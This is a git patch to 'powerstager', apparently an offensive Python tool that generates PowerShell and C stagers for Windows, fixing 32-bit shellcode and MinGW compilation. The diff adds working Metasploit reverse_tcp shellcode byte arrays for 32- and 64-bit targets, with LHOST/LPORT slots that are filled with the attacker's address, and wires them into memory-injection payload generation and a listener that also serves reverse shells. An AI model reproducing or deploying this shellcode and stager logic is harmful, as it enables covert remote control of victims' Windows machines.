From b0201c80008253e6682ff964960a80feb51629a5 Mon Sep 17 00:00:00 2001
From: z0noxz <z0noxz@mail.com>
Date: Fri, 9 Jun 2017 12:16:49 +0200
Subject: [PATCH] Fix for broken 32bit shellcode and mingw-compile (ISSUE #8)

---
 powerstager/powerstager.py | 66 +++++++++++++++++++++++++++++---------
 1 file changed, 51 insertions(+), 15 deletions(-)

diff --git a/powerstager/powerstager.py b/powerstager/powerstager.py
index 11f05b8..55dfbc1 100755
--- a/powerstager/powerstager.py
+++ b/powerstager/powerstager.py
@@ -283,10 +283,24 @@ class Utility(object):
 			lhost = [byte for byte in lhost if byte >= 0 and byte <= 255]
 			lport = int(lport)
 			if len(lhost) == 4 and lport > 0 and lport <= 65535:
-				return ",".join(hex(b) for b in (list(Utility.binary_array_string(lport))[::-1] + list(Utility.binary_array_string(lhost[0])) + list(Utility.binary_array_string(lhost[1])) + list(Utility.binary_array_string(lhost[2])) + list(Utility.binary_array_string(lhost[3]))))
+				return (",".join(hex(b) for b in list(Utility.binary_array_string(lport))[::-1]), (",".join(hex(b) for b in (list(Utility.binary_array_string(lhost[0])) + list(Utility.binary_array_string(lhost[1])) + list(Utility.binary_array_string(lhost[2])) + list(Utility.binary_array_string(lhost[3]))))))
 		except:
 			Print.error("There is something wrong with the LHOST and LPORT")
 		sys.exit(2)
+						
+	
+	@staticmethod
+	def replace_all(string, target, replacement):
+
+		target		= list(target)
+		replacement	= list(replacement)
+						
+		for i in range(len(target)):
+			if (i > (len(replacement) - 1)):
+				break
+			string = string.replace(target[i], replacement[i])
+						
+		return string
 
 	@staticmethod
 	def load_configuration(configuration):
@@ -446,11 +460,11 @@ powershell_block = Utility.enum(
 )
 
 
-memory_injection_payload = Utility.enum(
-	METERPRETER			= "meterpreter",
+shellcode = Utility.enum(
+	REVERSE_TCP_64			= "reverse_tcp_64",
+	REVERSE_TCP_32			= "reverse_tcp_32",
 )
 
-
 # Placeholder values for powershell blocks with obfuscation techniques
 obfuscation = {
 
@@ -701,7 +715,7 @@ c_source_mb = """
 c_source = """#include <stdlib.h>
 #include <windows.h>
 
-int WinMain(
+int WINAPI WinMain(
 	HINSTANCE	hInstance,
 	HINSTANCE	hPrevInstance,
 	LPTSTR		lpCmdLine,
@@ -747,7 +761,7 @@ c_source_embedded = """#define _CRT_SECURE_NO_DEPRECATE
 #include <stdlib.h>
 #include <windows.h>
 
-int WinMain(
+int WINAPI WinMain(
 	HINSTANCE	hInstance,
 	HINSTANCE	hPrevInstance,
 	LPTSTR		lpCmdLine,
@@ -837,9 +851,10 @@ powershell_blocks = {
 }
 
 # Payloads prepared for memory injection
-memory_injection_payloads = {
-	# metasploit stager for meterpreter. This also works with vncinjection on W7 (but fails on W10)
-	memory_injection_payload.METERPRETER
+shellcodes = {
+	
+	# reverse_tcp stager stager for metasploit.
+	shellcode.REVERSE_TCP_64
 	: "0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,"
 	+ "0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,"
 	+ "0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,"
@@ -869,6 +884,26 @@ memory_injection_payloads = {
 	+ "0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,"
 	+ "0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff,"
 	+ "0xe7",
+	
+	shellcode.REVERSE_TCP_32
+	: "0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,"
+	+ "0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,"
+	+ "0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,"
+	+ "0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,"
+	+ "0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,"
+	+ "0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,"
+	+ "0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,"
+	+ "0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,"
+	+ "0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,"
+	+ "0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,"
+	+ "0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,[_LHOST_],"   # << LHOST gets declared here as 4 bytes
+	+ "0x68,0x02,0x00,[_LPORT_],0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,"   # << LPORT gets declared here as 2 bytes
+	+ "0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,"
+	+ "0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,"
+	+ "0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,"
+	+ "0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,"
+	+ "0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,"
+	+ "0x1,0xc3,0x29,0xc6,0x75,0xee,0xc3",
 }
 
 
@@ -1447,11 +1482,12 @@ class Listener(object):
 		
 			if payload_type == conf_name.METERPRETER:
 				payload = generate_injection(
-					memory_injection_payloads[memory_injection_payload.METERPRETER].replace(
-						"[_LPORT_],[_LHOST_]",
+					Utility.replace_all(
+						shellcodes[(shellcode.REVERSE_TCP_32 if self.os_target == os_target.WIN32 else shellcode.REVERSE_TCP_64)],
+						("[_LPORT_]", "[_LHOST_]"),
 						Utility.local_address_to_binary_array_string(lhost, lport)
 					), self.os_target
-				).encode("utf8")		
+				).encode("utf8")
 
 			elif payload_type == conf_name.REVERSE_SHELL:
 				payload = generate_reverse_shell(lhost, lport).encode("utf8")
@@ -2379,7 +2415,6 @@ def generate_reverse_shell(lhost, lport):
 # Generates injection payload powershell block
 # Generates injection payloads either from templates or from path
 def generate_injection_payload():
-	global memory_injection_payloads
 
 	# Create an empty holder for an embedded payload
 	payload_embedded = ""
@@ -2392,8 +2427,9 @@ def generate_injection_payload():
 	elif Utility.get_configuration_value(conf_name.METERPRETER):
 		payload_embedded = Utility.ps_base64encode(
 			generate_injection(
-				memory_injection_payloads[memory_injection_payload.METERPRETER].replace(
-					"[_LPORT_],[_LHOST_]",
+				Utility.replace_all(
+					shellcodes[(shellcode.REVERSE_TCP_32 if Utility.get_configuration_value(conf_name.TARGET) == os_target.WIN32 else shellcode.REVERSE_TCP_64)],
+					("[_LPORT_]", "[_LHOST_]"),
 					Utility.local_address_to_binary_array_string(Utility.get_configuration_value(conf_name.LHOST), Utility.get_configuration_value(conf_name.LPORT))
 				), Utility.get_configuration_value(conf_name.TARGET)
 			)